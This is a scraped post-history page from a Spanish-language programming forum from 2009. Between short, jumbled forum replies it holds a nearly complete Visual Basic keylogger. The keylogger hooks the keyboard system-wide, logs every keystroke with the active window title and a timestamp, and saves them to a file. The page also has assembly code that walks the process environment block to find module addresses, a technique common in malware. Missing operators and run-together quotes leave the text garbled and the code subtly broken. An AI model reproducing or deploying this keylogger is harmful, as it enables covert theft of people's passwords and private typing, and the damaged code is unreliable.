Amerikano la función que pides no seria lo mismo que mi función cInstr
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúCita de: Eternal Idol en 11 Junio 2009, 09:14 AMEstoy ablando de funciones que generalmente uno necesita obviamente si alguien pide una tarea no se la voy a hacer.
B. Se pregunta por conceptos abstractos. Aquí no estamos para hacerle el trabajo a nadie
Cita de: dlna en 6 Junio 2009, 07:16 AMFue que no me gusto algo que hizo eternal y como cuando uno esta enojado hace estupideces .. borre todos los post.Cita de: YST en 1 Junio 2009, 19:55 PMque fue?Cita de: Pein en 1 Junio 2009, 19:38 PMPor una estupides que yo hice
Porque no es chincheta?
que el que si esta de post it, se me hace mas simple :S
Cita de: abelillo76 en 3 Junio 2009, 18:21 PMCita de: llword93ll en 3 Junio 2009, 15:55 PM
algo podras sacar pero no cuentes con todo y menos se codifico el code
Con que programa me recomendais para sacarlo?
Option Explicit
'| |
'|Autor: Karcrack |
'|Fecha: 24/09/08 |
'| |
Private Declare Function SetWindowsHookEx Lib "user32.dll" Alias "SetWindowsHookExA" (ByVal idHook As Long, ByVal lpfn As Long, ByVal hmod As Long, ByVal dwThreadId As Long) As Long
Private Declare Function UnhookWindowsHookEx Lib "user32.dll" (ByVal hHook As Long) As Long
Private Declare Function CallNextHookEx Lib "user32.dll" (ByVal hHook As Long, ByVal nCode As Long, ByVal wParam As Long, ByRef lParam As Any) As Long
Private Declare Sub CopyMemory Lib "kernel32.dll" Alias "RtlMoveMemory" (ByRef Destination As Any, ByRef Source As Any, ByVal Length As Long)
Private Declare Function GetAsyncKeyState Lib "user32.dll" (ByVal vKey As Long) As Integer
Private Const WH_KEYBOARD_LL As Long = 13
Private Declare Function GetForegroundWindow Lib "user32.dll" () As Long
Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
VkCode As Long
ScanCode As Long
Flags As Long
Time As Long
DwExtraInfo As Long
End Type
Dim KBHook As Long
Dim KeyData As String
Dim lHwnd As Long
Public Sub ManageKeylogger(ByVal Enable As Boolean)
Select Case Enable
Case True
KBHook = SetWindowsHookEx(WH_KEYBOARD_LL, AddressOf KBProc, App.hInstance, 0)
Case False
Call UnhookWindowsHookEx(KBHook)
End Select
End Sub
Public Function KBProc(ByVal nCode As Long, ByVal wParam As Long, lParam As Long) As Long
If nCode = 0 Then
CopyMemory KeyBoardHook, lParam, Len(KeyBoardHook)
With KeyBoardHook
If .Flags = 0 Or .Flags = 1 Then
If SaveLog(TranslateKey(.VkCode)) > 50 Then
Call LogToFile(App.Path & "\\Log.log")
End If
End If
End With
KBProc = CallNextHookEx(KBHook, nCode, wParam, lParam)
End If
End Function
Private Function TranslateKey(ByVal KeyCode As Long) As String
Dim LngShift As Long
'Funcion optimizada para su uso en teclados españoles.
LngShift = GetAsyncKeyState(vbKeyShift)
If KeyCode >= 58 And KeyCode <= 90 Then
TranslateKey = IIf(LngShift 0, UCase(Chr(KeyCode)), LCase(Chr(KeyCode)))
ElseIf KeyCode >= 96 And KeyCode = 112 And KeyCode <= 123 Then
TranslateKey = "{F" & KeyCode - 111 & "}"
If KeyCode = 160 Then TranslateKey = ""
If KeyCode = 161 Then TranslateKey = "{SHIFT DER.}"
If KeyCode = 38 Then TranslateKey = "{FLECHA ARRIBA}"
If KeyCode = 40 Then TranslateKey = "{FLECHA ABAJO}"
If KeyCode = 37 Then TranslateKey = "{FLECHA IZQ.}"
If KeyCode = 39 Then TranslateKey = "{FLECHA DER.}"
If KeyCode = 32 Then TranslateKey = "{ESPACIO}"
If KeyCode = 27 Then TranslateKey = "{ESC}"
If KeyCode = 46 Then TranslateKey = "{DEL}"
If KeyCode = 36 Then TranslateKey = "{HOME}"
If KeyCode = 35 Then TranslateKey = "{END}"
If KeyCode = 33 Then TranslateKey = "{PAGE UP}"
If KeyCode = 34 Then TranslateKey = "{PAGE DOWN}"
If KeyCode = 45 Then TranslateKey = "{PASTE}"
If KeyCode = 144 Then TranslateKey = "{NUM}"
If KeyCode = 111 Then TranslateKey = "{NUMPAD / }"
If KeyCode = 106 Then TranslateKey = "{NUMPAD * }"
If KeyCode = 109 Then TranslateKey = "{NUMPAD - }"
If KeyCode = 107 Then TranslateKey = "{NUMPAD + }"
If KeyCode = 13 Then TranslateKey = "{ENTER}"
If KeyCode = 8 Then TranslateKey = "{BACK}"
If KeyCode = 221 Then TranslateKey = "{ACCENTO}"
If KeyCode = 9 Then TranslateKey = "{TAB}"
If KeyCode = 20 Then TranslateKey = "{BLOQ. MAYUS}"
If KeyCode = 162 Then TranslateKey = "{STRG LEFT}"
If KeyCode = 163 Then TranslateKey = "{STRG DER.}"
If KeyCode = 91 Then TranslateKey = "{WINDOWS}"
If KeyCode = 164 Then TranslateKey = "{ALT}"
If KeyCode = 165 Then TranslateKey = "{ALTGR}"
If KeyCode = 93 Then TranslateKey = "{MENU CONTEXTUAL}"
If KeyCode = 188 Then TranslateKey = IIf(LngShift 0, ";", ",")
If KeyCode = 190 Then TranslateKey = IIf(LngShift 0, ":", ".")
If KeyCode = 189 Then TranslateKey = IIf(LngShift 0, "_", "-")
If KeyCode = 191 Then TranslateKey = IIf(LngShift 0, "'", "#")
If KeyCode = 187 Then TranslateKey = IIf(LngShift 0, "*", "+")
If KeyCode = 186 Then TranslateKey = IIf(LngShift 0, "Ü", "ü")
If KeyCode = 192 Then TranslateKey = IIf(LngShift 0, "Ö", "ö")
If KeyCode = 222 Then TranslateKey = IIf(LngShift 0, "Ä", "ä")
If KeyCode = 219 Then TranslateKey = IIf(LngShift 0, "?", "ß")
If KeyCode = 220 Then TranslateKey = IIf(LngShift 0, "°", "^")
If KeyCode = 48 Then TranslateKey = IIf(LngShift 0, "=", "0")
If KeyCode = 49 Then TranslateKey = IIf(LngShift 0, "!", "1")
If KeyCode = 50 Then TranslateKey = IIf(LngShift 0, """", "2")
If KeyCode = 51 Then TranslateKey = IIf(LngShift 0, "§", "3")
If KeyCode = 52 Then TranslateKey = IIf(LngShift 0, "$", "4")
If KeyCode = 53 Then TranslateKey = IIf(LngShift 0, "%", "5")
If KeyCode = 54 Then TranslateKey = IIf(LngShift 0, "&", "6")
If KeyCode = 55 Then TranslateKey = IIf(LngShift 0, "/", "7")
If KeyCode = 56 Then TranslateKey = IIf(LngShift 0, "(", "8")
If KeyCode = 57 Then TranslateKey = IIf(LngShift 0, ")", "9")
If KeyCode = 145 Then TranslateKey = "{ROLL}"
If KeyCode = 44 Then TranslateKey = "{PRINT}"
If KeyCode = 19 Then TranslateKey = "{PAUSE}"
If TranslateKey = "" And KeyCode 160 Then TranslateKey = KeyCode
End If
End Function
Public Function SaveLog(ByVal sKey As String) As Double
Dim aHwnd As Long
Dim WinText As String
aHwnd = GetForegroundWindow
If aHwnd lHwnd Then
lHwnd = aHwnd
WinText = String$(255, Chr$(0))
Call GetWindowText(aHwnd, WinText, Len(WinText))
WinText = Left$(WinText, InStr(WinText, Chr$(0)) - 1)
KeyData = KeyData & vbCrLf & "{" & WinText & "} - [" & Now() & "]" & vbCrLf
End If
KeyData = KeyData & sKey
SaveLog = Len(KeyData)
End Function
Public Sub LogToFile(ByVal sPath As String)
Open sPath For Binary As #1
Put #1, , KeyData
Close #1
End Sub
Cita de: 50l3r en 2 Junio 2009, 20:08 PMCuando quieras que finalizze ponle un
ordenadoritis jaja, la era de los sms![]()
muchas gracias ya me funciona
por cierto nose porque en el cliente cuando lo cierro sigue estando el proceso ;/
include ''
stdcall ASCIITOUNICODE,"ADVAPI32.dll",buffer
stdcall GetModuleHW,buffer
invoke GetModuleFileName,eax,buffer,MAX_PATH
invoke MessageBox,0,buffer,0,0
invoke ExitProcess,0
proc GetModuleHW,cName
push ebx edi esi
.if [cName] = 0
mov eax,dword [fs:18h]
mov eax,dword [eax+30h]
mov eax,dword [eax+8h]
jmp .salir
mov eax,[fs:30h]
mov eax,[eax+0Ch]
mov edi,[eax+10h]
mov esi,dword[edi+30h]
mov ebx,dword[edi+30h]
invoke lstrcmpW,[cName],ebx
.if eax <> 0
mov edi,[edi+4h]
cmp esi,dword[edi+30h]
jne .siguiente
jmp .salir
mov eax,dword[edi+18h]
jmp .salir
xor eax,eax
pop edi ebx
proc ASCIITOUNICODE,Cadena,Buffer
push ecx ebx
mov eax,[Cadena]
mov ebx,[Buffer]
dec eax
dec ebx
dec ebx
add eax,1
cmp byte[eax],0
je .salir
inc ebx
inc ebx
mov cl,byte[eax]
mov byte[ebx],cl
mov byte[ebx+1],0
jmp .bucle
pop ebx ecx
buffer rb MAX_PATH
.end start
section '.reloc' fixups data discardable